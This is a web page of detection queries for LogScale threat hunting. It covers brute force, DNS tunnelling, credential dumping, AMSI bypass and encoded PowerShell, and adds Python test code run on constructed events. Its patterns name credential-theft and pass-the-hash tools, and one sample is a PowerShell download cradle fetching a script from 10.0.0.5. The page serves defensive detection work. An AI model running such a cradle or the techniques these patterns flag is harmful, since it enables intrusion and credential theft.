LogScale · CQL

CQL Knowledge Base


Ready-to-use CQL queries for threat hunting, detection, and SOC triage. Copy, filter, and search in seconds.

154 queries · 8 categories
Powered by Sofistic · created by darkreitor
20 queries
PAID

DNS Tunneling Detection

Identifies potential DNS tunneling by detecting unusually long DNS query names or high query frequency to a single domain.

EventType = "DnsRequest"
| DomainName = /\.[a-z]{2,}\.[a-z]{2,}$/
| eval(domainLength = length(DomainName))
Network · dns · tunneling
Advanced
FREE

Failed Authentication Spike

Detects brute-force attempts by counting authentication failures per user and source IP within a time window.

EventType = "AuthFailure"
| stats(
    count() as FailCount,
Identity · brute-force · authentication
Beginner
PAID

Lateral Movement via SMB

Detects lateral movement using SMB protocol by correlating process events with network connections on port 445.

FileName = "cmd.exe" OR FileName = "powershell.exe"
| join(
    { NetworkEvent
EDR · lateral-movement · smb
Intermediate
PAID

AD Brute Force / Password Spray (NGSIEM)

Detects accounts with multiple authentication failures in Active Directory, an indicator of brute force or password spray. The query groups by account and source host, so it catches brute force against a single account; a spray that spreads a handful of attempts over many accounts stays under the per-pair threshold, and for that case pivot on the source host and count distinct accounts instead.

#event_simpleName=ActiveDirectoryAuthenticationFailure | groupBy([SourceAccountUserName, SourceEndpointHostName], function=count()) | _count > 50 | sort(_count, limit=20)
Identity · sofistic · ngsiem
Intermediate
PAID

AD Privileged Group Membership Change

Detects additions or removals to privileged Active Directory groups such as Domain Admins or Enterprise Admins.

#event_simpleName=ActiveDirectoryAuditGroupMemberModified | groupBy([SourceAccountUserName, SourceEndpointHostName], function=count()) | _count > 3 | sort(_count, limit=20)
Identity · sofistic · ngsiem
Intermediate
PAID

AMSI Bypass Attempt

Detects AMSI bypass attempts via PowerShell reflection or string obfuscation techniques used to evade AV/EDR scanning.

#event_simpleName=ProcessRollup2 CommandLine=/(amsiInitFailed|AmsiUtils|amsi\.dll|SetValue.*amsiContext|Reflection\.Assembly.*amsi)/i | groupBy([ComputerName, UserName, CommandLine], function=count()) | sort(_count, limit=20)
EDR · sofistic · defense-evasion
Advanced
PAID

Anomalous DNS Query Volume

Identifies hosts generating abnormally high DNS query volumes, a common indicator of DNS tunneling or C2 beaconing.

#event_simpleName=DnsRequest | groupBy([ComputerName], function=[count(), collect([DomainName])]) | _count > 5000 | sort(_count, limit=20)
Network · sofistic · exfiltration
Intermediate
PAID

Azure NSG Rule Changes

Detects additions or modifications to Azure Network Security Group rules that may expose resources to the internet. The query counts events per rule name, direction and access; the `_count > 10` threshold suppresses one-off changes, so when hunting for exposure drop it and filter on Inbound/Allow rules instead.

#event_simpleName=AzureNetworkSecurityGroupRule | groupBy([SecurityRuleName, SecurityRuleDirection, SecurityRuleAccess], function=count()) | _count > 10 | sort(_count, limit=20)
Cloud · sofistic · ngsiem
Intermediate
PAID

Brute Force / Password Spray

Detects accounts with more than 100 type-3 (network) logon failures, indicative of brute force or password spray. The 24h window is the search time range, not part of the query. `UserLogonFailed2` is the failed-logon event; `UserLogon` records successful logons and would count legitimate network logons instead. A spray distributes a few attempts across many accounts and stays under a per-account threshold, so hunt for it by pivoting on the source host and counting distinct accounts.

#event_simpleName=UserLogonFailed2 LogonType=3 | groupBy([UserName, ComputerName], function=count()) | _count > 100 | sort(_count, limit=20)
Identity · sofistic · brute-force
Intermediate
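The three identity cards above (Failed Authentication Spike, AD Brute Force / Password Spray, Brute Force / Password Spray) all group failures by account and source host. As an added example, not a query from this knowledge base, the following Python reimplements that groupBy over a constructed set of failure events and adds the inverse pivot for password spray, where each account fails only a few times and the signal is the number of distinct accounts per source. Field names mirror the queries; the sample events, thresholds and helper names are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def build_sample_events():
    """Constructed authentication-failure events (not real telemetry).
    Field names mirror the queries: UserName, ComputerName (source host), LogonType."""
    events = []
    # one account hammered from one host every 5 minutes: brute force (12 failures)
    for minute in range(0, 60, 5):
        events.append({"ts": f"2024-05-01T02:{minute:02d}:00", "UserName": "svc_backup",
                       "ComputerName": "WS-17", "LogonType": 3})
    # 25 accounts, one failure each, all from one host: password spray
    for i in range(25):
        events.append({"ts": "2024-05-01T03:00:00", "UserName": f"user{i:02d}",
                       "ComputerName": "WS-42", "LogonType": 3})
    # a user mistyping a password twice: benign noise
    events.append({"ts": "2024-05-01T09:00:00", "UserName": "alice", "ComputerName": "WS-01", "LogonType": 3})
    events.append({"ts": "2024-05-01T09:00:30", "UserName": "alice", "ComputerName": "WS-01", "LogonType": 3})
    # interactive failure (LogonType 2) that the LogonType=3 filter must drop
    events.append({"ts": "2024-05-01T09:05:00", "UserName": "bob", "ComputerName": "WS-02", "LogonType": 2})
    # a failure outside the 24h window
    events.append({"ts": "2024-05-03T01:00:00", "UserName": "svc_backup", "ComputerName": "WS-17", "LogonType": 3})
    return events


AUTH_FAILURES = build_sample_events()


def in_window(events, start_iso, hours=24):
    """Emulate the search time range: keep events with start <= ts < start + hours."""
    start = datetime.fromisoformat(start_iso)
    end = start + timedelta(hours=hours)
    return [e for e in events if start <= datetime.fromisoformat(e["ts"]) < end]


def brute_force_candidates(events, threshold=100, logon_type=3):
    """groupBy([UserName, ComputerName], function=count()) | _count > threshold | sort(_count)"""
    counts = defaultdict(int)
    for e in events:
        if e["LogonType"] == logon_type:
            counts[(e["UserName"], e["ComputerName"])] += 1
    hits = [(key, n) for key, n in counts.items() if n > threshold]
    return sorted(hits, key=lambda kv: -kv[1])


def password_spray_candidates(events, min_accounts=10, max_per_account=3, logon_type=3):
    """Inverse pivot: per source host, count distinct accounts that each failed only a few times.
    A spray stays under any per-account threshold by design, so the per-pair count never fires."""
    per_host = defaultdict(lambda: defaultdict(int))
    for e in events:
        if e["LogonType"] == logon_type:
            per_host[e["ComputerName"]][e["UserName"]] += 1
    hits = []
    for host, accounts in per_host.items():
        low_and_slow = sum(1 for n in accounts.values() if n <= max_per_account)
        if low_and_slow >= min_accounts:
            hits.append((host, low_and_slow))
    return sorted(hits, key=lambda hn: -hn[1])


if __name__ == "__main__":
    window = in_window(AUTH_FAILURES, "2024-05-01T00:00:00")
    print("brute force:", brute_force_candidates(window, threshold=10))
    print("password spray:", password_spray_candidates(window))
```

With the page's threshold of 100 the brute-force pivot returns nothing on this small sample; at 10 it returns only the hammered service account, and the spray host with 25 single-failure accounts is invisible to it until the per-source pivot is run.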
PAID

Credential Dumping Tools

Detects execution of known credential dumping tools (Mimikatz, ProcDump, pwdump, WCE, LaZagne, gsecdump, secretsdump) on Windows endpoints by file name. The pattern is unanchored, so `wce` also matches any file name containing those letters, and ProcDump is a legitimate Sysinternals tool; tune on FileName and CommandLine before turning this into an alert.

#event_simpleName=ProcessRollup2 FileName=/(mimikatz|procdump|pwdump|wce|lazagne|gsecdump|secretsdump)/i | groupBy([ComputerName, UserName, FileName], function=count()) | _count > 2 | sort(_count, limit=20)
EDR · sofistic · credential-access
Advanced
FREE

CSPM Policy Violations

Detects cloud security policy (CSPM) violations in Azure/GCP including public storage, missing encryption, and exposed management ports.

product_cspm=true | groupBy([#event_simpleName, azure_application_name, disposition], function=count()) | _count > 20 | sort(_count, limit=20)
Cloud · sofistic · ngsiem
Beginner
FREE

Data Staging via Archive Tools

Detects use of compression utilities (7z, rar, zip, tar, makecab) to package data from user or share paths, a pre-exfiltration staging indicator. The `-p` and `-r` alternatives (password-protected, recursive) are short and will also match unrelated flags, so treat hits as hunting leads rather than alerts.

#event_simpleName=ProcessRollup2 FileName=/(7z|7za|rar|winrar|zip|tar|makecab)\.exe/i CommandLine=/(\\Users\\|\\Shares\\|\\Documents\\|\\Desktop\\|-p|-r)/i | groupBy([ComputerName, UserName, FileName, CommandLine], function=count()) | _count > 3 | sort(_count, limit=20)
EDR · sofistic · exfiltration
Beginner
PAID

DCSync Attack Detected

Detects Directory Replication Service (DCSync) attempts used to extract password hashes from domain controllers without logging on.

#event_simpleName=DCSyncAttempted | groupBy([SourceAccountUserName, SourceEndpointHostName], function=count()) | _count > 5 | sort(_count, limit=20)
Identity · sofistic · ngsiem
Advanced
PAID

DNS Exfiltration Indicators

Detects DNS queries with abnormally long names (80+ characters), an indicator of DNS tunneling used for C2 or data exfiltration. The final `_count > 3` requires the same name to be queried more than three times by a host; a tunnel that encodes data in never-repeating subdomains produces one query per name and passes this filter, so also pivot on the number of distinct long subdomains per registrable domain.

#event_simpleName=DnsRequest | DomainName=/.{80,}/ | groupBy([ComputerName, DomainName], function=count()) | _count > 3 | sort(_count, limit=20)
Network · sofistic · exfiltration
Intermediate
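The DNS Tunneling Detection, Anomalous DNS Query Volume and DNS Exfiltration Indicators cards above each take one slice of the same problem: per-host query volume, name length, and repetition of a long name. As an added example, not a query from this knowledge base, the following Python runs those three checks over a constructed set of DnsRequest events and adds the pivot the page's queries lack: distinct high-entropy subdomains per registrable domain, which fires even when every queried name is unique. The sample events, the two-label approximation of the registrable domain, the entropy threshold and the helper names are assumptions.

```python
import hashlib
import math
import re
from collections import Counter, defaultdict

LONG_NAME = re.compile(r".{80,}")  # the DomainName=/.{80,}/ filter used in the exfiltration card


def build_sample_events():
    """Constructed DnsRequest events (not real telemetry); fields mirror the queries."""
    events = []
    # WS-01: ordinary lookups, each repeated 20 times, short subdomains
    for name in ["www.example.com", "cdn.example.net", "login.microsoftonline.com"] * 20:
        events.append({"ComputerName": "WS-01", "DomainName": name})
    # WS-07: a tunnel client sending data as a never-repeating 60-character hex label
    for i in range(300):
        payload = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:60]
        events.append({"ComputerName": "WS-07", "DomainName": f"{payload}.t.attacker-domain.test"})
    return events


DNS_EVENTS = build_sample_events()


def shannon_entropy(s):
    """Bits per character; hex payloads sit near 4.0, hostnames and words well below 3.5."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_domain(name):
    """Assumption: the last two labels are the registrable domain. Production code should use
    the Public Suffix List, since suffixes like co.uk break this shortcut."""
    labels = name.rstrip(".").split(".")
    return ".".join(labels[-2:])


def high_volume_hosts(events, threshold=5000):
    """groupBy([ComputerName], function=count()) | _count > threshold | sort(_count)"""
    counts = Counter(e["ComputerName"] for e in events)
    return sorted(((h, n) for h, n in counts.items() if n > threshold), key=lambda hn: -hn[1])


def long_query_names(events):
    """DomainName=/.{80,}/ | groupBy([ComputerName, DomainName], function=count()), before the _count > 3 cut."""
    return Counter((e["ComputerName"], e["DomainName"])
                   for e in events if LONG_NAME.search(e["DomainName"]))


def tunnel_candidates(events, min_unique=100, min_subdomain_len=30, min_entropy=3.0):
    """Per (host, registrable domain): number of distinct long, high-entropy subdomains.
    Unlike the per-name count, this fires when every name is unique, which is how tunnels behave."""
    seen = defaultdict(set)
    for e in events:
        name = e["DomainName"]
        rd = registrable_domain(name)
        sub = name[: -len(rd)].rstrip(".")
        if len(sub) >= min_subdomain_len and shannon_entropy(sub) >= min_entropy:
            seen[(e["ComputerName"], rd)].add(sub)
    hits = [(key, len(subs)) for key, subs in seen.items() if len(subs) >= min_unique]
    return sorted(hits, key=lambda kn: -kn[1])


if __name__ == "__main__":
    print("volume:", high_volume_hosts(DNS_EVENTS, threshold=100))
    print("long names repeated > 3:", [k for k, n in long_query_names(DNS_EVENTS).items() if n > 3])
    print("tunnel candidates:", tunnel_candidates(DNS_EVENTS))
```

On this sample the tunnelling host produces 300 names over 80 characters, every one queried exactly once, so the page's `_count > 3` cut returns nothing for it while the distinct-subdomain pivot returns the host and domain pair at full strength; the volume check only fires once the threshold is lowered well below the page's 5000.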
PAID

LSASS Memory Access

Detects command lines that reference LSASS from a process other than lsass.exe (for example ProcDump dumping lsass.exe), a common route to credential extraction with tools like Mimikatz or ProcDump. This is a command-line indicator, not a detection of the handle access itself: a tool that opens the process by PID never mentions lsass on its command line. The match is a case-insensitive regex because plain `=*lsass*` wildcard matching in LogScale is case-sensitive.

#event_simpleName=ProcessRollup2 CommandLine=/lsass/i FileName!=lsass.exe | groupBy([ComputerName, UserName, FileName, CommandLine], function=count()) | _count > 2 | sort(_count, limit=20)
EDR · sofistic · credential-access
Advanced
FREE

Network Share Enumeration

Detects mass network share enumeration via net view, net share, or similar tools indicative of lateral movement preparation.

#event_simpleName=ProcessRollup2 CommandLine=/(net\s+view|net\s+share|Invoke-ShareFinder|Get-NetShare|Get-DFSshare)/i | groupBy([ComputerName, UserName, CommandLine], function=count()) | _count > 5 | sort(_count, limit=20)
Threat Hunting · sofistic · discovery
Beginner
PAID

Pass-the-Hash / Overpass-the-Hash

Detects Pass-the-Hash techniques via sekurlsa, pth-winexe, Rubeus, or similar tools that abuse NTLM hashes for authentication.

#event_simpleName=ProcessRollup2 CommandLine=/(sekurlsa|pth-winexe|Invoke-SMBExec|Invoke-TheHash|Invoke-WMIExec|Overpass-the-Hash|rubeus.*ptt|rubeus.*asktgt)/i | groupBy([ComputerName, UserName, FileName, CommandLine], function=count()) | sort(_count, limit=20)
EDR · sofistic · lateral-movement
Advanced
PAID

PowerShell Download Cradle

Detects PowerShell downloading payloads via IEX, Invoke-WebRequest, Net.WebClient, or similar download cradle patterns.

| ...
EDR · sofistic · execution
Intermediate
PAID

PowerShell Encoded Commands

Detects PowerShell execution with Base64-encoded commands (-enc, -encodedcommand) commonly used to evade AV/EDR detection. The `-e\s` alternative only catches the bare `-e` form; powershell.exe accepts any prefix of -EncodedCommand as well as `/` as the switch character, so `-ec`, `-en` and `/e` variants slip past this pattern and the regex should be widened before relying on it.

#event_simpleName=ProcessRollup2 FileName=/(powershell|pwsh)\.exe/i CommandLine=/(\-enc|\-encodedcommand|\-e\s)/i | groupBy([ComputerName, UserName, CommandLine], function=count()) | _count > 5 | sort(_count, limit=20)
EDR · sofistic · execution
Intermediate
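The PowerShell Download Cradle and PowerShell Encoded Commands cards above match on the command line, but an encoded command hides the cradle inside the Base64 argument. As an added example, not a query from this knowledge base, the following Python applies the page's `-enc` pattern and a wider one that covers every abbreviation powershell.exe accepts, decodes the UTF-16LE payload, and then runs the cradle check on the decoded script. The sample command lines, the 10.0.0.5 URL, the cradle keyword list and the helper names are assumptions; the switch-prefix behaviour is that of powershell.exe's own parameter parser.

```python
import base64
import re

POWERSHELL_EXE = re.compile(r"(powershell|pwsh)\.exe", re.I)
# The pattern as written in the Encoded Commands query above.
PAGE_PATTERN = re.compile(r"(\-enc|\-encodedcommand|\-e\s)", re.I)
# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) plus the alias -ec,
# with either - or / as the switch character; the argument is Base64 of UTF-16LE text.
ABBREVIATIONS = ["encodedcommand"[:i] for i in range(1, 15)] + ["ec"]
ENC_PATTERN = re.compile(
    r"(?:^|\s)[-/](?:" + "|".join(sorted(ABBREVIATIONS, key=len, reverse=True))
    + r")\s+['\"]?([A-Za-z0-9+/=]{8,})",
    re.I,
)
# Assumed download-cradle indicators, checked against the decoded script rather than the raw command line.
CRADLE = re.compile(r"(IEX|Invoke-Expression|DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient)", re.I)


def encode_ps(script):
    """What an attacker runs to build the -enc argument (UTF-16LE, then Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed ProcessRollup2-style events, not real telemetry.
SAMPLES = [
    {"ComputerName": "WS-01", "UserName": "alice", "FileName": "powershell.exe",
     "CommandLine": "powershell.exe -NoP -W Hidden -enc "
                    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/a.ps1')")},
    {"ComputerName": "WS-02", "UserName": "bob", "FileName": "powershell.exe",
     "CommandLine": "powershell.exe -ec " + encode_ps("Get-Process")},   # alias the page regex misses
    {"ComputerName": "WS-03", "UserName": "carol", "FileName": "pwsh.exe",
     "CommandLine": "pwsh.exe /E " + encode_ps("whoami")},                 # slash switch, bare -e form
    {"ComputerName": "WS-04", "UserName": "dave", "FileName": "powershell.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},  # benign
    {"ComputerName": "WS-05", "UserName": "erin", "FileName": "powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
]


def matches_page_pattern(cmdline):
    return PAGE_PATTERN.search(cmdline) is not None


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_PATTERN.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    try:
        raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    except ValueError:
        return None
    return raw.decode("utf-16-le", errors="replace")


def is_download_cradle(script):
    return CRADLE.search(script) is not None


def detect_encoded(events):
    """FileName filtered with the (powershell|pwsh).exe regex from the query, then the wider
    switch pattern; yields (event, decoded script) pairs for triage."""
    hits = []
    for e in events:
        if not POWERSHELL_EXE.search(e["FileName"]):
            continue
        decoded = decode_encoded_command(e["CommandLine"])
        if decoded is not None:
            hits.append((e, decoded))
    return hits


if __name__ == "__main__":
    for event, script in detect_encoded(SAMPLES):
        print(event["ComputerName"], "cradle" if is_download_cradle(script) else "other", repr(script))
```

Of the three encoded samples only the `-enc` one matches the page's regex; the wider pattern catches all three, and decoding is what exposes the cradle on WS-01, which a raw `IEX|DownloadString` search of the command line would never see.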
PAID

Process Injection Indicators

Detects process injection techniques and tools via command-line indicators (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread, NtMapViewOfSection, QueueUserAPC) and the PowerShell injection cmdlets Invoke-ReflectivePEInjection and Inject-Shellcode. Injection that never names these APIs on the command line is out of scope for this query.

#event_simpleName=ProcessRollup2 CommandLine=/(Invoke-ReflectivePEInjection|Inject-Shellcode|VirtualAllocEx|WriteProcessMemory|CreateRemoteThread|NtMapViewOfSection|QueueUserAPC)/i | groupBy([ComputerName, UserName, FileName, CommandLine], function=count()) | sort(_count, limit=20)
EDR · sofistic · defense-evasion
Advanced